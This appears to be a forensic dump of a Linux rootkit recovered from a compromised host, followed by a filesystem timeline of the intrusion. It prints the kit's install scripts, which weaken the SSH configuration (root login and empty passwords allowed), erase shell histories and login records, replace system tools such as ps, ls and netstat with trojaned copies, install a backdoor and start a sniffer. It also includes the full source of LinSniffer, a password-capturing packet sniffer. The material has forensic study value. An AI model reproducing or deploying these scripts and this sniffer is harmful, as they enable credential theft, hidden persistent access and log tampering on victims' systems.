ssh*
make
install
rm
-rf /etc/sshd_config
cat
<< hi >> /etc/sshd_config
#
This is ssh server systemwide configuration file.
Port
22
ListenAddress
0.0.0.0
HostKey
/etc/ssh_host_key
RandomSeed
/etc/ssh_random_seed
ServerKeyBits
768
LoginGraceTime
600
KeyRegenerationInterval
3600
PermitRootLogin
yes
IgnoreRhosts
no
StrictModes
yes
QuietMode
yes
X11Forwarding
yes
X11DisplayOffset
10
FascistLogging
no
PrintMotd
yes
KeepAlive
yes
SyslogFacility
DAEMON
RhostsAuthentication
no
RhostsRSAAuthentication
yes
RSAAuthentication
yes
PasswordAuthentication
yes
PermitEmptyPasswords
yes
UseLogin
no
#
CheckMail no
#
PidFile /u/zappa/.ssh/pid
#
AllowHosts *.our.com friend.other.com
#
DenyHosts lowsecurity.theirs.com *.evil.org evil.org
#
Umask 022
#
SilentDeny yes
hi
echo "/usr/local/sbin/sshd1" >>
/etc/rc.d/rc.local
ps aux | grep sshd | awk '{print "kill -1
"$2""}' > restart-sshd
chmod +x restart-sshd
echo "done installing sshd"
echo "now restarting"
echo "dont forget to remove the sshd folders"
./restart-sshd
..............................................................................................................................................................
..............................................................................................................................................................
.................................................................................................................................................Ci/install-na
med...................................................................................0100755.0001762.0000144.00000000120.07116120705.012675.
0...............
.....................................................................................ustar
.xrt.............................users............................
..............................................................................................................................................................
........................gunzip
named.tgz;tar -xvf named.tar
cd
bin
./install
cd
..
########################################################
rm
-rf bin named.tar
..............................................................................................................................................................
..............................................................................................................................................................
.....................................................................................................................Ci/install...............................
..........................................................0100755.0001762.0000144.00000002730.07144535562.011640.
0...........................................
.........................................................ustar .xrt.............................users........................................................
..........................................................................................................................................................#!/b
in/sh
rm -rf /root/.bash_history
ln -s /dev/null /root/.bash_history
rm -rf /.bash_history
ln -s /dev/null /.bash_history
rm -rf ~games/.bash_history
ln -s /dev/null ~games/.bash_history
rm -rf /tmp/.bash_history
ln -s /dev/null /tmp/.bash_history
rm -rf /usr/games/.bash_history
ln -s /dev/null /usr/games/.bash_history
mkdir backup
cp /bin/ps backup
cp /usr/bin/top backup
cp /usr/sbin/syslogd backup
cp /bin/ls backup
cp /bin/netstat backup
cp /sbin/ifconfig backup
cp /usr/sbin/tcpd backup
echo "Trojaning in progress"
./fix /bin/ps ps
./fix /usr/bin/top top
./fix /usr/sbin/syslogd syslogd
./fix /bin/ls ls
./fix /sbin/ifconfig ifconfig
./fix /bin/netstat netstat
./fix /usr/sbin/tcpd tcpd
./fix /usr/sbin/in.identd in.identd
killall -HUP syslogd
./addbd
./snif &
echo "Sniffer ENABLED"
echo "running clean and a.sh"
./clean
./a.sh
mv ptyp /dev
gunzip rpms.tgz;tar -xvf rpms.tar;cd rpms;rpm -Uvh --force
*.rpm;cd ..;rm -rf rpms*
killall -1 lpd
rm -rf /var/log/wtmp
cd /var/log
touch wtmp
cd /usr/man/.Ci
rm -rf install addbd
killall -HUP inetd
cp bx /bin/
chmod 755 /bin/bx
rm /usr/sbin/in.ftpd
mv in.ftpd /usr/sbin/
chmod +x /usr/sbin/in.ftpd
echo "done with installing shit"
echo "i'll now run whereis sshd"
echo "if nothing shows up then run ./install-sshd"
echo "if it's in /usr/local/sbin/sshd then run
./install-sshd"
echo "if it's in /usr/sbin/sshd then run
./install-sshd1"
whereis sshd
echo "after successfully installing sshd, run ./do"
echo "rootkit installation complete."
.........................................Ci/snif............................................................................................0100755.0001762.00
00144.00000016075.07116120705.011124.
0....................................................................................................ustar .xrt........
.....................users....................................................................................................................................
................................................
/*
LinSniffer
0.03 [BETA]
Mike
Edulla
medulla@infosoc.com
*/
#include
<sys/types.h>
#include
<sys/socket.h>
#include
<sys/time.h>
#include
<netinet/in.h>
#include
<netdb.h>
#include
<string.h>
#include
<linux/if.h>
#include
<signal.h>
#include
<stdio.h>
#include
<arpa/inet.h>
#include
<linux/socket.h>
#include
<linux/ip.h>
#include
<linux/tcp.h>
#include
<linux/if_ether.h>
int
openintf(char *);
int
read_tcp(int);
int
filter(void);
int
print_header(void);
int
print_data(int, char *);
char
*hostlookup(unsigned long int);
void
clear_victim(void);
void
cleanup(int);
struct
etherpacket
{
struct ethhdr eth;
struct iphdr ip;
struct tcphdr tcp;
char buff[8192];
}ep;
struct
{
unsigned long saddr;
unsigned long daddr;
unsigned short sport;
unsigned short dport;
int bytes_read;
char active;
time_t start_time;
}
victim;
struct
iphdr *ip;
struct
tcphdr *tcp;
int
s;
FILE
*fp;
#define
CAPTLEN 512
#define
TIMEOUT 30
#define
TCPLOG "tcp.log"
int
openintf(char *d)
{
int fd;
struct ifreq ifr;
int s;
fd=socket(AF_INET, SOCK_PACKET,
htons(0x800));
if(fd < 0)
{
perror("cant get SOCK_PACKET
socket");
exit(0);
}
strcpy(ifr.ifr_name, d);
s=ioctl(fd, SIOCGIFFLAGS, &ifr);
if(s < 0)
{
close(fd);
perror("cant get flags");
exit(0);
}
ifr.ifr_flags |= IFF_PROMISC;
s=ioctl(fd, SIOCSIFFLAGS, &ifr);
if(s < 0) perror("cant set
promiscuous mode");
return fd;
}
int
read_tcp(int s)
{
int x;
while(1)
{
x=read(s, (struct etherpacket *)&ep,
sizeof(ep));
if(x > 1)
{
if(filter()==0) continue;
x=x-54;
if(x < 1) continue;
return x;
}
}
}
int
filter(void)
{
int p;
p=0;
if(ip->protocol != 6) return 0;
if(victim.active != 0)
if(victim.bytes_read > CAPTLEN)
{
fprintf(fp, "\n----- [CAPLEN
Exceeded]\n");
clear_victim();
return 0;
}
if(victim.active != 0)
if(time(NULL) > (victim.start_time +
TIMEOUT))
{
fprintf(fp, "\n----- [Timed
Out]\n");
clear_victim();
return 0;
}
if(ntohs(tcp->dest)==21) p=1; /* ftp */
if(ntohs(tcp->dest)==23) p=1; /* telnet */
if(ntohs(tcp->dest)==110) p=1; /* pop3
*/
if(ntohs(tcp->dest)==109) p=1; /* pop2
*/
if(ntohs(tcp->dest)==143) p=1; /* imap2
*/
if(ntohs(tcp->dest)==513) p=1; /* rlogin
*/
if(ntohs(tcp->dest)==106) p=1; /*
poppasswd */
if(victim.active == 0)
if(p == 1)
if(tcp->syn == 1)
{
victim.saddr=ip->saddr;
victim.daddr=ip->daddr;
victim.active=1;
victim.sport=tcp->source;
victim.dport=tcp->dest;
victim.bytes_read=0;
victim.start_time=time(NULL);
print_header();
}
if(tcp->dest != victim.dport) return 0;
if(tcp->source != victim.sport) return
0;
if(ip->saddr != victim.saddr) return 0;
if(ip->daddr != victim.daddr) return 0;
if(tcp->rst == 1)
{
victim.active=0;
alarm(0);
fprintf(fp, "\n-----
[RST]\n");
clear_victim();
return 0;
}
if(tcp->fin == 1)
{
victim.active=0;
alarm(0);
fprintf(fp, "\n-----
[FIN]\n");
clear_victim();
return 0;
}
return 1;
}
int
print_header(void)
{
fprintf(fp, "\n");
fprintf(fp, "%s => ",
hostlookup(ip->saddr));
fprintf(fp, "%s [%d]\n",
hostlookup(ip->daddr), ntohs(tcp->dest));
}
int
print_data(int datalen, char *data)
{
int i=0;
int t=0;
victim.bytes_read=victim.bytes_read+datalen;
for(i=0;i != datalen;i++)
{
if(data[i] == 13) { fprintf(fp,
"\n"); t=0; }
if(isprint(data[i])) {fprintf(fp,
"%c", data[i]);t++;}
if(t > 75) {t=0;fprintf(fp,
"\n");}
}
}
main(int
argc, char **argv)
{
s=openintf("eth0");
ip=(struct iphdr *)(((unsigned
long)&ep.ip)-2);
tcp=(struct tcphdr *)(((unsigned
long)&ep.tcp)-2);
signal(SIGHUP, SIG_IGN);
signal(SIGINT, cleanup);
signal(SIGTERM, cleanup);
signal(SIGKILL, cleanup);
signal(SIGQUIT, cleanup);
if(argc == 2) fp=stdout;
else fp=fopen(TCPLOG, "at");
if(fp == NULL) { fprintf(stderr, "cant
open log\n");exit(0);}
clear_victim();
for(;;)
{
read_tcp(s);
if(victim.active != 0)
print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2);
fflush(fp);
}
}
char
*hostlookup(unsigned long int in)
{
static char blah[1024];
struct in_addr i;
struct hostent *he;
i.s_addr=in;
he=gethostbyaddr((char *)&i,
sizeof(struct in_addr),AF_INET);
if(he == NULL) strcpy(blah, inet_ntoa(i));
else strcpy(blah, he->h_name);
return blah;
}
void
clear_victim(void)
{
victim.saddr=0;
victim.daddr=0;
victim.sport=0;
victim.dport=0;
victim.active=0;
victim.bytes_read=0;
victim.start_time=0;
}
void
cleanup(int sig)
{
fprintf(fp, "Exiting...\n");
close(s);
fclose(fp);
exit(0);
}
Nov
06 00 01:00:41 4096 mac -rw-r--r--
root root /var/run/ftp.pids-all
Nov 06 00 02:02:00 1024 m.c drwxr-xr-x root
root /var/lib
1024 m.c drwxr-xr-x root
root /var/spool/anacron
Nov
06 00 02:02:03 4096 m.c drwxr-xr-x
root root /usr/X11R6/man
4096 m.c drwxr-xr-x
root root /usr/lib/perl5/man
4096 m.c drwxr-xr-x
root root /usr/local/man
464 mac -rw-r--r--
root root /var/lib/logrotate.status
9 m.c -rw-------
root root /var/spool/anacron/cron.daily
0 mac -rw-r--r--
root root /usr/X11R6/man/whatis
0 mac -rw-r--r--
root root /usr/lib/perl5/man/whatis
0 mac -rw-r--r--
root root /usr/local/man/whatis
0 mac -rw-r--r--
root root /usr/man/whatis
1024 m.c drwxrwxr-x
root uucp /var/lock
1024 ..c drwxrwxrwx
xfs xfs /tmp/.font-unix
1024 m.c drwxr-x---
root slocate /var/lib/slocate
238767 m.c -rw-r-----
root slocate /var/lib/slocate/slocate.db
Nov
08 00 06:26:15 0 m.c -rw-r--r--
root root /etc/hosts.deny
Nov
08 00 06:51:54 714 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/a.sh
7229 ..c -rwxr-xr-x 1010 users
/usr/man/.Ci/snif
Nov
08 00 06:51:55 698 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/clean
147900 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/inetd
12495 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/killall
49800 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/pstree
133344 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/q
132785 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/qs
4096 ..c drwxr-xr-x
1010 users /usr/man/.Ci/scan
4096 ..c drwxr-xr-x
1010 users /usr/man/.Ci/scan/amd
114 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/scan/amd/a.sh
12716 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/scan/amd/amdx
13023 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/scan/amd/ben
1455 ..c -rwxr-xr-x
1010 users
/usr/man/.Ci/scan/amd/ben.c
15667 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/scan/amd/pscan
4442 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/scan/amd/pscan.c
4096 ..c drwxr-xr-x
1010 users /usr/man/.Ci/scan/bind
1760 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/scan/bind/ibind.sh
3980 ..c -rw-r--r--
1010 users /usr/man/.Ci/scan/bind/pscan.c
4096 ..c drwxr-xr-x
1010 users /usr/man/.Ci/scan/daemon
5907 ..c -rw-------
1010 users /usr/man/.Ci/scan/daemon/lscan2.c
12392 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/scan/daemon/z0ne
4096 ..c drwxr-xr-x 1010 users
/usr/man/.Ci/scan/port
4096 ..c drwxr-xr-x
1010 users /usr/man/.Ci/scan/port/strobe
171 ..c -rw-------
1010 users /usr/man/.Ci/scan/port/strobe/INSTALL
1187 ..c -rw-------
1010 users /usr/man/.Ci/scan/port/strobe/Makefile
17 ..c -rw-------
1010 users /usr/man/.Ci/scan/port/strobe/VERSION
3296 ..c -rw------- 1010 users
/usr/man/.Ci/scan/port/strobe/strobe.1
17364 ..c -rw-------
1010 users /usr/man/.Ci/scan/port/strobe/strobe.c
39950 ..c -rw-------
1010 users /usr/man/.Ci/scan/port/strobe/strobe.services
4096 ..c drwxr-xr-x
1010 users /usr/man/.Ci/scan/statd
4390 ..c -rw-r--r--
1010 users /usr/man/.Ci/scan/statd/classb
19140 ..c -rw-r--r--
1010 users /usr/man/.Ci/scan/statd/r
21800 ..c -rw-r--r--
1010 users /usr/man/.Ci/scan/statd/statdx
4096 ..c drwxr-xr-x
1010 users /usr/man/.Ci/scan/wu
26676 ..c -rw-r--r--
1010 users /usr/man/.Ci/scan/wu/fs
37760 ..c -rw-r--r--
1010 users /usr/man/.Ci/scan/wu/wu
4096 ..c drwxr-xr-x
1010 users /usr/man/.Ci/scan/x
15092 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/scan/x/pscan
3980 ..c -rw-r--r--
1010 users /usr/man/.Ci/scan/x/pscan.c
17969 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/scan/x/x
1259 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/scan/x/xfil
385 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/scan/x/xscan
3098 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/snap
5324 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/sp.pl
350996 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/syslogd
Nov
08 00 06:51:56 4096 ..c drwxr-xr-x
1010 users /usr/man/.Ci/
118 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/ /Anap
12408 ..c -rwxr-xr-x 1010 users
/usr/man/.Ci/addn
83 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/addps
1052024 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/bx
699 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/chmod-it
328 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/do
185988 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/find
18535 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/fix
156 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/needz
4096 ..c drwxr-xr-x
1010 users /usr/man/.Ci/paki
8524 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/paki/slice2
6793 ..c -rw-r--r--
1010 users /usr/man/.Ci/paki/stream.c
188 ..c -rwxr-xr-x
1010 users /usr/man/.Ci/rmS
Nov
08 00 06:52:09 9 m.c lrwxrwxrwx
root root /.bash_history -> /dev/null
9 m.c lrwxrwxrwx
root root /root/.bash_history -> /dev/null
9 m.c lrwxrwxrwx
root root /tmp/.bash_history -> /dev/null
4096 m.c drwxr-xr-x
root root /usr/games
9 mac lrwxrwxrwx
root root /usr/games/.bash_history -> /dev/null
4096 mac drwxr-xr-x
root root /usr/man/.Ci/backup
42736 mac -rwxr-xr-x
root root /usr/man/.Ci/backup/ifconfig
43024 mac -rwxr-xr-x
root root /usr/man/.Ci/backup/ls
66736 mac -rwxr-xr-x
root root /usr/man/.Ci/backup/netstat
60080 mac -r-xr-xr-x
root root
/usr/man/.Ci/backup/ps
23568 mac -rwxr-xr-x
root root /usr/man/.Ci/backup/tcpd
34896 mac -r-xr-xr-x
root root /usr/man/.Ci/backup/top
Nov
08 00 06:52:12 4096 m.c drwxr-xr-x
root root /usr/man
102 mac -rw-r--r--
root root /usr/man/.a
58 mac -rw-r--r--
root root /usr/man/.p
58 mac -rw-r--r--
root root /usr/man/p
61 m.c -rw-r--r-- root
root /usr/man/r
5 mac -rw-r--r--
root root /usr/man/.Ci/sniff.pid
0 mac -rw-r--r--
root root /usr/man/.Ci/tcp.log
Nov
08 00 06:52:15 171 ..c -rw-r--r--
1010 users /dev/ptyp
Nov
08 00 06:52:25 1024 ..c drwxr-xr-x
root root /.automount
670 ..c -rw-------
root root /etc/amd.conf
105 ..c -rw-r-----
root root /etc/amd.net
766 ..c -rwxr-xr-x
root root /etc/rc.d/init.d/amd
1024 m.c drwxr-xr-x
root root /etc/sysconfig
56 ..c -rwxr-xr-x
root root /etc/sysconfig/amd
8024 ..c -rwxr-xr-x root
root /usr/bin/pawd
9084 ..c -rw-r--r--
root root /usr/doc/am-utils-6.0.1s11/AUTHORS
3933 ..c -rw-r--r--
root root /usr/doc/am-utils-6.0.1s11/BUGS
147946 ..c -rw-r--r-- root root
/usr/doc/am-utils-6.0.1s11/ChangeLog
23786 ..c -rw-r--r--
root root /usr/doc/am-utils-6.0.1s11/NEWS
3817 ..c -rw-r--r--
root root /usr/doc/am-utils-6.0.1s11/README
4113 ..c -rw-r--r--
root root /usr/doc/am-utils-6.0.1s11/README.autofs
1225 ..c -rw-r--r--
root root /usr/doc/am-utils-6.0.1s11/README.y2k
621985 ..c -rw-r--r--
root root /usr/doc/am-utils-6.0.1s11/am-utils.ps
3201 ..c -rw-r--r--
root root /usr/doc/am-utils-6.0.1s11/amd.conf-sample
4096 m.c drwxr-xr-x
root root /usr/doc/am-utils-6.0.1s11
189318 ..c -rw-r--r--
root root /usr/doc/am-utils-6.0.1s11/hlfsd.ps
3006 ..c -rw-r--r--
root root /usr/doc/am-utils-6.0.1s11/lostaltmail.conf-sample
15625 ..c -rw-r--r-- root root
/usr/info/am-utils.info-1.gz
15324 ..c -rw-r--r--
root root /usr/info/am-utils.info-2.gz
14152 ..c -rw-r--r--
root root /usr/info/am-utils.info-3.gz
13984 ..c -rw-r--r--
root root /usr/info/am-utils.info-4.gz
15354 ..c -rw-r--r--
root root /usr/info/am-utils.info-5.gz
5011 ..c -rw-r--r--
root root /usr/info/am-utils.info-6.gz
7086 ..c -rw-r--r-- root
root
/usr/info/am-utils.info-7.gz
2954 ..c -rw-r--r--
root root /usr/info/am-utils.info.gz
8192 m.c drwxr-xr-x
root root /usr/lib
15 m.c lrwxrwxrwx
root root /usr/lib/libamu.so -> libamu.so.2.1.1
15 m.c lrwxrwxrwx
root root /usr/lib/libamu.so.2 -> libamu.so.2.1.1
40370 ..c -rwxr-xr-x
root root /usr/lib/libamu.so.2.1.1
3026 ..c -rw-r--r--
root root /usr/man/man1/pawd.1
19031 ..c -rw-r--r--
root root /usr/man/man5/amd.conf.5
10003 ..c -rw-r--r--
root root /usr/man/man8/amd.8
6318 ..c -rw-r--r-- root root
/usr/man/man8/amq.8
3784 ..c -rw-r--r--
root root /usr/man/man8/automount2amd.8
5453 ..c -rw-r--r--
root root /usr/man/man8/fixmount.8
2818 ..c -rw-r--r--
root root /usr/man/man8/fsinfo.8
9641 ..c -rw-r--r--
root root /usr/man/man8/hlfsd.8
2571 ..c -rw-r--r--
root root /usr/man/man8/mk-amd-map.8
2806 ..c -rw-r--r-- root root
/usr/man/man8/wire-test.8
1043 ..c -rwxr-xr-x
root root /usr/sbin/am-eject
106640 ..c -rwxr-xr-x
root root /usr/sbin/amd
1392 ..c -rwxr-xr-x root root
/usr/sbin/amd2ldif
1003 ..c -rwxr-xr-x
root root /usr/sbin/amd2sun
13892 ..c -rwxr-xr-x
root root /usr/sbin/amq
2257 ..c -rwxr-xr-x
root root /usr/sbin/automount2amd
2170 ..c -rwxr-xr-x
root root /usr/sbin/ctl-hlfsd
1521 ..c -rwxr-xr-x
root root /usr/sbin/fix-amd-map
10808 ..c -rwxr-xr-x root root
/usr/sbin/fixmount
404 ..c -rwxr-xr-x
root root /usr/sbin/fixrmtab
34784 ..c -rwxr-xr-x
root root /usr/sbin/fsinfo
29656 ..c -rwxr-xr-x
root root /usr/sbin/hlfsd
18412 ..c -rwxr-xr-x
root root /usr/sbin/lostaltmail
7588 ..c -rwxr-xr-x
root root /usr/sbin/mk-amd-map
804 ..c -rwxr-xr-x
root root /usr/sbin/wait4amd
965 ..c -rwxr-xr-x
root root /usr/sbin/wait4amd2die
5140 ..c -rwxr-xr-x
root root /usr/sbin/wire-test
Nov
08 00 06:52:31 12333 m.c -rw-r--r--
root root /etc/ld.so.cache
1024 m.c drwxr-xr-x root root
/etc/rc.d/rc0.d
13 mac lrwxrwxrwx
root root /etc/rc.d/rc0.d/K28amd -> ../init.d/amd
1024 m.c drwxr-xr-x
root root /etc/rc.d/rc1.d
13 mac lrwxrwxrwx root root
/etc/rc.d/rc1.d/K28amd -> ../init.d/amd
1024 m.c drwxr-xr-x
root root /etc/rc.d/rc2.d
13 mac lrwxrwxrwx
root root /etc/rc.d/rc2.d/K28amd -> ../init.d/amd
1024 m.c drwxr-xr-x
root root /etc/rc.d/rc3.d
13 mac lrwxrwxrwx
root root /etc/rc.d/rc3.d/K28amd -> ../init.d/amd
1024 m.c drwxr-xr-x
root root /etc/rc.d/rc4.d
13 mac lrwxrwxrwx
root root /etc/rc.d/rc4.d/K28amd -> ../init.d/amd
1024 m.c drwxr-xr-x
root root /etc/rc.d/rc5.d
13 mac lrwxrwxrwx
root root /etc/rc.d/rc5.d/K28amd -> ../init.d/amd
1024 m.c drwxr-xr-x
root root /etc/rc.d/rc6.d
13 mac lrwxrwxrwx
root root /etc/rc.d/rc6.d/K28amd -> ../init.d/amd
Nov
08 00 06:52:32 1176 .ac -rwxr-xr-x root root
/etc/rc.d/init.d/lpd
13 .ac lrwxrwxrwx
root root /etc/rc.d/rc0.d/K60lpd -> ../init.d/lpd
13 .ac lrwxrwxrwx
root root /etc/rc.d/rc1.d/K60lpd -> ../init.d/lpd
13 .ac lrwxrwxrwx root root
/etc/rc.d/rc2.d/S60lpd -> ../init.d/lpd
13 .ac lrwxrwxrwx
root root /etc/rc.d/rc3.d/S60lpd -> ../init.d/lpd
13 .ac lrwxrwxrwx
root root /etc/rc.d/rc5.d/S60lpd -> ../init.d/lpd
13 .ac lrwxrwxrwx
root root /etc/rc.d/rc6.d/K60lpd -> ../init.d/lpd
3564 ..c -r--r--r--
root root /etc/screenrc
1024 m.c drwxr-xr-x
root root /etc/skel
3394 ..c -rw-r--r--
root root /etc/skel/.screenrc
4 .ac lrwxrwxrwx
root root /usr/bin/gmake -> make
15816 ..c -r-xr-xr-x
root lp /usr/bin/lpq
15608 ..c -r-xr-xr-x
root lp /usr/bin/lpr
16248 ..c -r-xr-xr-x
root lp /usr/bin/lprm
3656 ..c -rwxr-xr-x
root root /usr/bin/lptest
104316 ..c -rwxr-xr-x
root root /usr/bin/make
4096 m.c drwxr-xr-x
root root /usr/doc/make-3.77
26571 ..c -rw-r--r--
root root /usr/doc/make-3.77/NEWS
2141 ..c -r--r--r--
root root /usr/doc/make-3.77/README
14727 ..c -rw-r--r--
root root /usr/info/make.info-1.gz
1928 ..c -rw-r--r--
root root /usr/info/make.info-10.gz
15693 ..c -rw-r--r--
root root /usr/info/make.info-2.gz
15515 ..c -rw-r--r--
root root /usr/info/make.info-3.gz
15275 ..c -rw-r--r--
root root /usr/info/make.info-4.gz
15324 ..c -rw-r--r--
root root /usr/info/make.info-5.gz
15459 ..c -rw-r--r--
root root /usr/info/make.info-6.gz
14989 ..c -rw-r--r--
root root /usr/info/make.info-7.gz
5385 ..c -rw-r--r--
root root /usr/info/make.info-8.gz
7253 ..c -rw-r--r--
root root /usr/info/make.info-9.gz
2111 .ac -rw-r--r--
root root /usr/info/make.info.gz
4650 ..c -rwxr-xr-x
root root /usr/man/man1/lpq.1
7458 ..c -rw-r--r--
root root /usr/man/man1/lpr.1
4633 ..c -rw-r--r--
root root /usr/man/man1/lprm.1
2861 ..c -rw-r--r-- root root
/usr/man/man1/lptest.1
7598 ..c -rw-r--r--
root root /usr/man/man1/make.1
7845 ..c -rw-r--r--
root root /usr/man/man5/printcap.5
5907 ..c -rw-r--r--
root root /usr/man/man8/lpc.8
7422 ..c -rw-r--r--
root root /usr/man/man8/lpd.8
3857 ..c -rw-r--r--
root root /usr/man/man8/pac.8
24104 ..c -rwxr-Sr-x
root lp /usr/sbin/lpc
51740 ..c -rwxr--r--
root root /usr/sbin/lpd
5140 ..c -rwxr-xr-x
root root /usr/sbin/lpf
9412 ..c -rwxr--r--
root root /usr/sbin/pac
1024 ..c drwxrwxr-x root
daemon /var/spool/lpd
Nov
08 00 06:52:33 2048 m.c drwxr-xr-x
root root /bin
1024 m.c drwxr-xr-x
root root /etc/X11
1024 m.c drwxr-xr-x
root root /etc/X11/applnk/Internet
1024 mac drwxr-xr-x
root root /etc/X11/wmconfig
114 ..c -rw-r--r--
root root /etc/X11/wmconfig/telnet
13281 mac -rw-r--r--
root root /etc/info-dir
1084 .ac -rwxr-xr-x
root root /etc/rc.d/init.d/yppasswdd
1137 .ac -rwxr-xr-x
root root /etc/rc.d/init.d/ypserv
1398 ..c -rw-r--r--
root root /etc/ypserv.conf
236468 ..c -rwxr-xr-x
root root /usr/bin/screen
64608 ..c -rwxr-xr-x
root root /usr/bin/telnet
4096 m.c drwxr-xr-x
root root /usr/doc/screen-3.9.4
14081 ..c -rw-r--r-- root root
/usr/doc/screen-3.9.4/FAQ
3619 ..c -rw-r--r--
root root /usr/doc/screen-3.9.4/NEWS
3437 ..c -rw-r--r--
root root /usr/doc/screen-3.9.4/README
6447 ..c -rw-r--r-- root root
/usr/doc/screen-3.9.4/README.DOTSCREEN
4096 m.c drwxr-xr-x
root root /usr/doc/ypserv-1.3.9
191 ..c -rw-r--r--
root root /usr/doc/ypserv-1.3.9/BUGS
34068 ..c -rw-r--r--
root root /usr/doc/ypserv-1.3.9/ChangeLog
6037 ..c -rw-r--r--
root root /usr/doc/ypserv-1.3.9/INSTALL
2471 ..c -rw-r--r--
root root /usr/doc/ypserv-1.3.9/NEWS
3595 ..c -rw-r--r--
root root /usr/doc/ypserv-1.3.9/README
259 ..c -rw-r--r--
root root /usr/doc/ypserv-1.3.9/README.etc
2849 ..c -rw-r--r--
root root /usr/doc/ypserv-1.3.9/README.secure
286 ..c -rw-r--r--
root root /usr/doc/ypserv-1.3.9/TODO
471 ..c -rw-r--r--
root root /usr/doc/ypserv-1.3.9/securenets
1398 ..c -rw-r--r--
root root /usr/doc/ypserv-1.3.9/ypserv.conf
4096 m.c drwxr-xr-x
root root /usr/include/rpcsvc
7242 ..c -rw-r--r--
root root /usr/include/rpcsvc/ypxfrd.x
8192 m.c drwxr-xr-x root root /usr/info
16094 ..c -rw-r--r--
root root /usr/info/screen.info-1.gz
15113 ..c -rw-r--r--
root root /usr/info/screen.info-2.gz
16847 ..c -rw-r--r--
root root /usr/info/screen.info-3.gz
12505 ..c -rw-r--r--
root root /usr/info/screen.info-4.gz
1978 .ac -rw-r--r--
root root /usr/info/screen.info.gz
4096 m.c drwxr-xr-x root
root /usr/lib/yp
1361 ..c -rwxr-xr-x
root root /usr/lib/yp/create_printcap
12384 ..c -rwxr-xr-x
root root /usr/lib/yp/makedbm
95 ..c -rwxr-xr-x
root root /usr/lib/yp/match_printcap
10244 ..c -rwxr-xr-x
root root /usr/lib/yp/mknetid
2295 ..c -rwxr-xr-x
root root /usr/lib/yp/pwupdate
10004 ..c -rwxr-xr-x
root root /usr/lib/yp/revnetgroup
10884 ..c -rwxr-xr-x
root root /usr/lib/yp/yphelper
4110 ..c -rwxr-xr-x
root root /usr/lib/yp/ypinit
19272 ..c -rwxr-xr-x root root
/usr/lib/yp/ypxfr
329 ..c -rwxr-xr-x
root root /usr/lib/yp/ypxfr_1perday
246 ..c -rwxr-xr-x
root root /usr/lib/yp/ypxfr_1perhour
260 ..c -rwxr-xr-x root root
/usr/lib/yp/ypxfr_2perday
129824 ..c -rw-r--r--
root root /usr/man/man1/screen.1
32150 ..c -rw-r--r--
root root /usr/man/man1/telnet.1
1002 ..c -rw-r--r--
root root /usr/man/man5/issue.net.5
1914 ..c -rw-r--r--
root root /usr/man/man5/netgroup.5
2739 ..c -rw-r--r--
root root /usr/man/man5/ypserv.conf.5
12823 ..c -rw-r--r--
root root /usr/man/man8/in.telnetd.8
2112 ..c -rw-r--r--
root root /usr/man/man8/makedbm.8
2492 ..c -rw-r--r--
root root /usr/man/man8/mknetid.8
678 ..c -rw-r--r--
root root /usr/man/man8/pwupdate.8
592 ..c -rw-r--r--
root root /usr/man/man8/revnetgroup.8
6962 ..c -rw-r--r--
root root /usr/man/man8/rpc.yppasswdd.8
4004 ..c -rw-r--r--
root root /usr/man/man8/rpc.ypxfrd.8
12 mac lrwxrwxrwx
root root /usr/man/man8/telnetd.8 -> in.telnetd.8
1593 ..c -rw-r--r--
root root /usr/man/man8/ypinit.8
25 ..c -rw-r--r-- root root
/usr/man/man8/yppasswdd.8
2830 ..c -rw-r--r--
root root /usr/man/man8/yppush.8
4886 ..c -rw-r--r--
root root /usr/man/man8/ypserv.8
4320 ..c -rw-r--r-- root root
/usr/man/man8/ypxfr.8
22 ..c -rw-r--r--
root root /usr/man/man8/ypxfrd.8
35628 ..c -rwxr-xr-x
root root /usr/sbin/in.telnetd
18448 ..c -rwxr-xr-x root
root /usr/sbin/rpc.yppasswdd
25212 ..c -rwxr-xr-x
root root /usr/sbin/rpc.ypxfrd
14520 ..c -rwxr-xr-x
root root /usr/sbin/yppush
40476 ..c -rwxr-xr-x
root root /usr/sbin/ypserv
1024 m.c drwxr-xr-x
root root /var/yp
13843 ..c -rw-r--r--
root root /var/yp/Makefile
471 ..c -rw-r--r--
root root /var/yp/securenets
Nov
08 00 06:52:34 1052024 m.c -rwxr-xr-x
root root /bin/bx
Nov
08 00 06:53:06 1024 m.c drwxr-x---
root root /root
12288 m.c -rw-rw-r--
root root /etc/psdevtab
1024 m.c drwxr-xr-x
root root /root/.ssh
537 m.c -rw-------
root root /etc/ssh_host_key
341 mac -rw-r--r--
root root /etc/ssh_host_key.pub
512 m.c -rw-------
root root
/root/.ssh/random_seed
Nov
08 00 06:53:11 880 m.c -rw-r--r--
root root /etc/ssh_config
3 mac lrwxrwxrwx
root root /usr/local/bin/slogin -> ssh
4 mac lrwxrwxrwx
root root /usr/local/bin/ssh -> ssh1
11 mac lrwxrwxrwx
root root /usr/local/bin/ssh-keygen -> ssh-keygen1
327262 mac -rwxr-xr-x
root root /usr/local/bin/ssh-keygen1
